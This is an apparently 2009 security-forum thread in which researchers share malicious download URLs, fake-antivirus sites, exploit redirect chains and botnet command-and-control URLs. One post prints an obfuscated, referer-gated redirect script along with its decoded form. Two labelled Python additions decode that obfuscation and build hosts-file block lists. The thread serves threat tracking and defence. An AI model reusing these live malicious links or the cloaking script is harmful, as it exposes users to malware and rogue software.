Author Topic: daily something......  (Read 797415 times)


May 15, 2009, 03:16:58 am
Reply #405

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Koobface:
Code:
71.8.59.249/setup.exe
Trojan:
Code:
vexpen.jino.ru/file/bot.exe
http://www.virustotal.com/analisis/60c864a624b006b5c3a1e9875ae99c4a

Fake AV:
Code:
antvirushelpv1.com
(download link ain't working atm but will work soon I guess..)

Code:
securityhelpcenter.com/1/
(currently only have a link to the fake payment site at:
Code:
live-payment-system.com/buy.php?nh=1&id=
Mal-Aware

May 15, 2009, 03:29:06 am
Reply #406

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
http://antvirushelpv1.com/download.php?id=2004

;)

Downloads: Install_2004.exe (132K)

Actually just came across it whilst researching a malicious URL in the Google results that redirected me to it;

qualitycollisionbodyshop.com/gkxtd/zunet/cadets.htm

You've got to load it with a Google referer string though, or it'll redir you to nothingsville courtesy of;

Code:
*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://qualitycollisionbodyshop.com/gkxtd/zunet/2.js
Server IP: 76.162.102.189 [ rev.opentransfer.com.189.102.162.76.in-addr.arpa ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 15 May 2009
Time: 04:22:43:22
*****************************************************************

eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,102,40,41,123,13,10,118,97,114,32,114,61,100,111,99,117,109,101,110,116,46,114,101,102,101,114,114,101,114,44,116,61,34,34,44,113,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,103,111,111,103,108,101,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,109,115,110,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,121,97,104,111,111,46,34,41,33,61,45,49,41,116,61,34,112,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,108,116,97,118,105,115,116,97,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,111,108,46,34,41,33,61,45,49,41,116,61,34,113,117,101,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,115,107,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,99,111,109,99,97,115,116,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,98,101,108,108,115,111,117,116,104,46,34,41,33,61,45,49,41,116,61,34,115,116,114,105,110,103,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,110,101,116,115,99,97,112,101,46,34,41,33,61,45,49,41,116,61,34,113,117,101,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,109,121,119,101,98,115,101,97,114,99,104,46,34,41,33,61,45,49,41,116,61,34,115,101,97,114,99,104,102,111,114,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,112,101,111,112,108,101,112,99,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,115,116,97,114,119,97,114,101,46,34,41,33,61,45,49,41,116,61,34,113,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,101,97,114,116,104,108,105,110,107,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,116,46,108,101,110,103,116,104,38,38,40,40,113,61,114,46,105,110,100,101,120,79,102,40,34,63,34,43,116,43,34,61,34,41,41,33,61,45,49,124,124,40,113,61,114,46,105,110,100,101,120,79,102,40,34,38,34,43,116,43,34,61,34,41,41,33,61,45,49,41,41,32,13,10,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,32,61,32,40,34,104,116,116,112,58,47,47,111,112,101,110,115,116,97,114,49,46,110,101,116,47,105,110,46,99,103,105,63,57,38,115,101,111,114,101,102,61,34,43,101,110,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,100,111,99,117,109,101,110,116,46,114,101,102,101,114,114,101,114,41,43,34,38,112,97,114,97,109,101,116,101,114,61,36,107,101,121,119,111,114,100,38,115,101,61,36,115,101,38,117,114,61,49,38,72,84,84,80,95,82,69,70,69,82,69,82,61,34,43,101,110,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,100,111,99,117,109,101,110,116,46,85,82,76,41,43,34,38,100,101,102,97,117,108,116,95,107,101,121,119,111,114,100,61,100,101,102,97,117,108,116,34,41,59,32,13,10,125,13,10,13,10,119,105,110,100,111,119,46,111,110,70,111,99,117,115,32,61,32,102,40,41));

Which decodes to;

Code:
function f(){
var r=document.referrer,t="",q;
if(r.indexOf("google.")!=-1)t="q";
if(r.indexOf("msn.")!=-1)t="q";
if(r.indexOf("yahoo.")!=-1)t="p";
if(r.indexOf("altavista.")!=-1)t="q";
if(r.indexOf("aol.")!=-1)t="query";
if(r.indexOf("ask.")!=-1)t="q";
if(r.indexOf("comcast.")!=-1)t="q";
if(r.indexOf("bellsouth.")!=-1)t="string";
if(r.indexOf("netscape.")!=-1)t="query";
if(r.indexOf("mywebsearch.")!=-1)t="searchfor";
if(r.indexOf("peoplepc.")!=-1)t="q";
if(r.indexOf("starware.")!=-1)t="qry";
if(r.indexOf("earthlink.")!=-1)t="q";
if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))
window.location = ("http://openstar1.net/in.cgi?9&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default");
}

window.onFocus = f()

/edit

http://www.virustotal.com/analisis/d3008ef63c7db98bc3da9b63a3e567d2
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net
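The referer-gated script quoted above is a standard cloaking pattern: the page only redirects visitors who arrive from a search engine with a recognisable query parameter, so a direct fetch, or a scanner that sends no referer, sees a harmless page and the rogue domain is never reached. The following is an added example, not code from the thread or from vURL, showing how an analyst can decode the `eval(String.fromCharCode(...))` wrapper statically and summarise the cloaking logic without ever executing the script. The sample payload is constructed in the same shape as the quoted 2.js, and the redirect host `redirector.example` is a placeholder, not one of the indicators posted in the thread.

```python
"""Static decoder for eval(String.fromCharCode(...)) obfuscation plus a
referer-cloaking report. Added example; not code from the thread."""
import re

# Constructed sample: same shape as the quoted 2.js (a fromCharCode-wrapped function
# that inspects document.referrer), with a hypothetical redirect host.
_PLAINTEXT = (
    'function f(){\r\n'
    'var r=document.referrer,t="",q;\r\n'
    'if(r.indexOf("google.")!=-1)t="q";\r\n'
    'if(r.indexOf("yahoo.")!=-1)t="p";\r\n'
    'if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))\r\n'
    'window.location = ("http://redirector.example/in.cgi?9&seoref="'
    '+encodeURIComponent(document.referrer));\r\n'
    '}\r\n\r\nwindow.onFocus = f()'
)
SAMPLE_SCRIPT = (
    "eval(String.fromCharCode("
    + ",".join(str(ord(c)) for c in _PLAINTEXT)
    + "));"
)

FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")
INDEXOF_RE = re.compile(r'indexOf\("([^"]+)"\)')
LOCATION_RE = re.compile(r'window\.location\s*=\s*\(?\s*"(https?://[^"]+)')


def decode_fromcharcode(script):
    """Decode every String.fromCharCode(n,n,...) numeric array in script to text."""
    decoded = []
    for match in FROMCHARCODE_RE.finditer(script):
        codes = [int(n) for n in match.group(1).split(",") if n.strip()]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def unwrap_layers(script, max_layers=5):
    """Peel nested fromCharCode layers until none remain.

    Returns (final_text, layers_peeled). max_layers bounds the loop so a payload
    that re-encodes itself cannot spin the analyst's tool forever.
    """
    text, layers = script, 0
    while layers < max_layers:
        parts = decode_fromcharcode(text)
        if not parts:
            break
        text = "\n".join(parts)
        layers += 1
    return text, layers


def referer_gate_report(js):
    """Summarise referer cloaking in decoded JavaScript: which referers unlock
    the redirect, where the browser is sent, and whether it fires on focus."""
    gated_on = sorted({s for s in INDEXOF_RE.findall(js) if s.endswith(".")})
    return {
        "reads_referrer": "document.referrer" in js,
        "gated_on": gated_on,
        "redirect_targets": LOCATION_RE.findall(js),
        "runs_on_focus": "onFocus" in js or "onfocus" in js,
    }


def analyze(script):
    """Decode, then report: the whole workflow for one captured script."""
    text, layers = unwrap_layers(script)
    report = referer_gate_report(text)
    report["layers_peeled"] = layers
    return text, report


if __name__ == "__main__":
    decoded, report = analyze(SAMPLE_SCRIPT)
    print(decoded)
    for key, value in report.items():
        print(f"{key}: {value}")
```

Two practical points. If the numeric array was copied from a post where it wrapped across lines, a number can be split in two and the decoded text will be corrupted at that point, so join the lines before decoding. And the `gated_on` list is exactly what a defender needs to reproduce the behaviour safely: a scanner that fetches with a referer matching one of those entries (including the expected query parameter) will observe the redirect that a plain fetch hides.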

May 15, 2009, 04:00:57 am
Reply #407

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
I actually can download it directly:
Code:
http://antvirushelpv1.com/download.php?id=2004
Mal-Aware

May 15, 2009, 04:09:22 am
Reply #408

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
You can, or can't?

/edit

It was the .js file on the domain that redirs to the rogue domain I had to supply the Google referer to btw, not the rogue domain ;)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 15, 2009, 05:55:27 am
Reply #409

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Quote
You can, or can't?

/edit

It was the .js file on the domain that redirs to the rogue domain I had to supply the Google referer to btw, not the rogue domain ;)

 ;D
Mal-Aware

May 18, 2009, 03:37:50 am
Reply #410

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Mal-Aware

May 18, 2009, 11:51:34 am
Reply #411

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

May 19, 2009, 06:25:21 am
Reply #412

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Exploit/trojan:
Code:
pimpalas.cn/yespdf/index.php
http://wepawet.iseclab.org/view.php?hash=d8776172d856e083138ff2828f1c28ae&t=1242712689&type=js

Redirect to fake AV:
Code:
gogenscan.com
gozonescan.com
Fake AV:
Code:
fanscan4.info
miniscan4.info
scanlist6.com
luxscan4.info
Mal-Aware

May 19, 2009, 11:50:56 am
Reply #413

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Code:
pearch.net/in.cgi?7
redirects to
Code:
europpc.com/search.php?iw=1&links=
links redirect to
Code:
wplstr.net/in.cgi?20
redirects to fake system check
Code:
systemstabilityscan.com/5
starts download
Code:
http://adioro.com/download.php?aid=5
redirects to
Code:
dl1.adioro.com/get.php?track_id=5
downloads
Code:
dl1.adioro.com/distribs/5/registryoptimizer.exe
http://www.virustotal.com/de/analisis/99110a3a11c3cba50d7725b2453813ec 0/40
MD5...: fcd4b853dcea9d412fab09c66134058a
Ruining the bad guy's day

May 19, 2009, 03:52:16 pm
Reply #414

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL
72.47.253.37

redirects to exploits:
Code:
hxxp://findbigbrother.cn:8080/ts/in.cgi?pepsi6
hxxp://bestwebfind.cn:8080/ts/in.cgi?pepsi11
hxxp://findyourbigwhy.cn:8080/ts/in.cgi?pepsi7
hxxp://findbigboob.cn:8080/ts/in.cgi?pepsi6
Wepawet
Wepawet
Wepawet
The latest has no report (Wepawet has had too many submissions for hours)

May 19, 2009, 04:11:26 pm
Reply #415

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL
redirects to exploits
91.212.41.119
Code:
hxxp://silzefos.cn/s/in.cgi?13
Wepawet
Registrant: Meng Qun / janglkd@ yeah.net

exploits / trojan
221.5.74.52
Code:
hxxp://profit-marketing.net/earningn/t.php
hxxp://profit-marketing.net/earningn/ll.php?b=2&s=snaj
hxxp://profit-marketing.net/earningn/ll.php?b=1&s=Co11ab
hxxp://profit-marketing.net/earningn/ll.php?b=1&s=ODAY
hxxp://profit-marketing.net/earningn/ll.php?b=1&s=Ut1l
hxxp://profit-marketing.net/imocs.swf
hxxp://profit-marketing.net/inocs.pdf
Registrant: Michell.Gregory2009@ yahoo.com

Wepawet (exploit)

VirusTotal (flash) - 3/39 (7.69%)
Wepawet (flash)

VirusTotal (pdf) - 7/39 (17.95%)
VirusTotal (exe) - 3/39 (7.69%)

Anubis
ThreatExpert

Botnet C&C:
213.182.197.249
Code:
hxxp://krottorot.cn/ging/controller.php?action=bot&entity_list=&uid=&first=1&guid=1824245000&rnd=946862
hxxp://krottorot.cn/ging/controller.php?action=report&guid=0&rnd=946862&uid=&entity=1241486361:unique_start
Source: Anubis
Registrant: Chen / chen.poon1732646@ yahoo.com

Botnet C&C:
78.129.166.5
Code:
hxxp://ftpshki.cn/admin/controller.php?action=bot&entity_list=&uid=1&first=1&guid=1824245000&rnd=2514213
hxxp://ftpshki.cn/admin/controller.php?action=report&guid=0&rnd=25142137&uid=1&entity=1238216956:unique_start
hxxp://ftpshki.cn/admin/receiver/online
Source: Anubis
Registrant: SmithJohn / Chehhost@ admin.ru

May 19, 2009, 05:42:36 pm
Reply #416

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL
91.209.163.201 - vl01.c76.fvtn.net
Code:
hxxp://download.official-emule.com/Live-Player_setup.php
hxxp://download.original-solitaire.com/Live-Player_setup.php

91.209.163.202 - vl02.c76.fvtn.net
Code:
hxxp://download.go-turf.com/Live-Player_setup.php
hxxp://download.gomusic.com/Live-Player_setup.php
hxxp://download.littlesmileys.com/Live-Player_setup.php
hxxp://download.official-bittorrent.com/Live-Player_setup.php
hxxp://download.schnellsucher.com/Live-Player_setup.php
hxxp://download.search-solver.com/Live-Player_setup.php
hxxp://download.smilymail.com/Live-Player_setup.php
hxxp://download.trovarapido.com/Live-Player_setup.php
hxxp://download.web-mediaplayer.com/Live-Player_setup.php

91.209.163.203 - vl03.c76.fvtn.net
Code:
hxxp://download.backstripgirls.com/Live-Player_setup.php
hxxp://download.buscalisto.com/Live-Player_setup.php
hxxp://download.games-attack.com/Live-Player_setup.php
hxxp://download.go-astro.com/Live-Player_setup.php
hxxp://download.gomusic.net/Live-Player_setup.php
hxxp://download.hot-tv.com/Live-Player_setup.php
hxxp://download.speed-downloading.com/Live-Player_setup.php

same file:
Quote
File size: 233000 bytes
MD5: 67a6bfee47f1e6c7d1c03d8c02df6b95
VirusTotal - 12/40 (30%)

Registrant: Ramon Viladomiu / 2ffba9ee4ff19e8587163b873c03ff22-913471@ contact.gandi.net

related to: http://www.siteadvisor.com/sites/live-player.com
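The hxxp:// lists in the three posts above are the raw material for a hosts-file block list, but they arrive defanged, carry ports, paths and tracking parameters, and sit next to VirusTotal and Wepawet report links that must not be blocked. As an added example, not code from the thread or from hpHosts, here is a normaliser that turns such a post into hosts-file and IP blocklist entries. The sample post is constructed in the shape of the ones above, using hypothetical `.example`/`.invalid` names and RFC 5737 test addresses rather than the thread's real indicators.

```python
"""Turn defanged indicator lists into hosts-file and IP blocklist entries.
Added example; not code from the thread or from hpHosts."""
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample in the shape of the posts above (hypothetical names and
# RFC 5737 test addresses, not the thread's indicators).
SAMPLE_POST = """
192.0.2.37

redirects to exploits:
hxxp://findsomething.example:8080/ts/in.cgi?pepsi6
hxxp://findsomething.example:8080/ts/in.cgi?pepsi11
hxxp://other-tld.invalid/s/in.cgi?13
Wepawet

203.0.113.5 - vl01.c76.hoster.invalid
hxxp://download.player.example/Live-Player_setup.php
http://www.virustotal.com/analisis/00000000000000000000000000000000
hxxp://999.1.1.1/not-an-ip
"""

URL_RE = re.compile(r"\b(?:hxxps?|https?)://[^\s\"'<>()]+")
BARE_IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Report sites that appear in posts as evidence, never as indicators.
ANALYSIS_HOSTS = {"www.virustotal.com", "virustotal.com", "wepawet.iseclab.org"}


def refang(token):
    """Undo the hxxp:// and [.] defanging used in the posts."""
    return re.sub(r"^hxxp", "http", token).replace("[.]", ".")


def _as_ip(host):
    """Canonical IP string, or None if host is not a valid address."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        return None


def extract_indicators(text):
    """Return (hostnames, ip_addresses) mentioned in a post.

    Ports, paths and query strings are dropped, analysis-report URLs are
    skipped, and malformed dotted quads such as 999.1.1.1 are rejected.
    """
    hosts, ips = set(), set()
    for raw in URL_RE.findall(text):
        host = urlsplit(refang(raw)).hostname
        if not host or host in ANALYSIS_HOSTS:
            continue
        ip = _as_ip(host)
        if ip:
            ips.add(ip)
        elif not host.replace(".", "").isdigit():  # drop invalid dotted quads
            hosts.add(host)
    for raw in BARE_IP_RE.findall(text):
        ip = _as_ip(raw)
        if ip:
            ips.add(ip)
    return hosts, ips


def hosts_file_lines(text, sinkhole="127.0.0.1"):
    """hosts-file entries: sinkhole address followed by the name, sorted."""
    hosts, _ = extract_indicators(text)
    return [f"{sinkhole} {h}" for h in sorted(hosts)]


def ip_blocklist(text):
    """Valid IPs from the post, sorted numerically rather than as strings."""
    _, ips = extract_indicators(text)
    return sorted(ips, key=ipaddress.ip_address)


if __name__ == "__main__":
    print("\n".join(hosts_file_lines(SAMPLE_POST)))
    print("\n".join(ip_blocklist(SAMPLE_POST)))
```

Only schemed URLs and bare dotted quads are harvested; a reverse-DNS name written after an IP (the `vl01.c76...` style in the post above) is deliberately ignored, because it names the hosting box, not the malicious site, and blocking it would hit every customer on that server.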

May 19, 2009, 07:28:26 pm
Reply #417

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

May 20, 2009, 05:22:23 am
Reply #418

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Emold:
Code:
ku98.biz/ghost/dia.exe
http://www.virustotal.com/analisis/6e833596122310890ab85283b612aa02
Trojan:
Code:
rezident77.ru/files/cry.exe
http://www.virustotal.com/analisis/860b0c60fcc25b00b58075cff3492cd8
Koobface:
Code:
121.13.55.49/setup.exe
79.181.99.78/setup.exe
Mal-Aware

May 21, 2009, 06:20:21 am
Reply #419

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Trojan:
Code:
samog0n.info/analyse/3xNt0f6b9e3R.exe
http://www.virustotal.com/analisis/3f6196088309178a7ced521f2ac381c0
Trojan:
Code:
tamporn.net/indir.exe
http://www.virustotal.com/analisis/33ac4a6f5025b70f407812c3637cb084
Trojan:
Code:
yourelitehosting.ru/explorer.exe
http://www.virustotal.com/analisis/b8fcb40a031230efbfaa9b3e0ff6e8a9

Redirects to rogue:
Code:
spyware-systems.info/0/go.php?sid=2
Exploit/trojan:
Code:
dr-w-corporation.ru/404/cache/readme.pdf
http://wepawet.iseclab.org/view.php?hash=ceda3c3478def91606b1f1eff10aee05&t=1242931942&type=js
Mal-Aware